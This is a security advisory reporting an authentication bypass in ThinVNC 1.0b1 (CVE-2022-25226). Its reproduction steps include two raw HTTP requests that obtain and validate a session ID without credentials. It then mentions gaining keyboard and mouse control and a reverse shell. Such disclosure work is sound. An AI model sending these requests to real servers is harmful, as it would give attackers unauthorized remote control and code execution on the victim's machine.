ThinVNC - Auth Bypass

[alestorm980]

Bug description

ThinVNC version 1.0b1 allows an unauthenticated user to bypass the authentication process via http://thin-vnc:8080/cmd?cmd=connect by obtaining a valid SID without any kind of authentication. It is possible to achieve code execution on the server by sending keyboard or mouse events to the server.

CVSSv3 Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSSv3 Base Score:

10.0

Steps to reproduce

1. Send a request to the application in order to obtain a valid SID.

GET /cmd?cmd=connect&destAddr=poc&id=0 HTTP/1.1
Host: 172.16.28.140:8081
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: http://172.16.28.140:8081/
Cookie: SID=

2. Obtain the SID from the server response and create a new request in order to validate the SID.

GET /cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=[SID] HTTP/1.1
Host: 172.16.28.140:8081
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: http://172.16.28.140:8081/
Cookie: SID=[SID]

3. Now it is possible to send keystrokes or mouse moves to the server using the validated SID

4. An exploit can be used to obtain a reverse shell on the server running the ThinVNC application.

Screenshots and files

System Information

• Version: ThinVNC version 1.0b1.
• Operating System: Windows 10.

[alestorm980]

We have reserved the CVE-2022-25226 to refer this issue. The advisory is in https://fluidattacks.com/advisories/sinatra.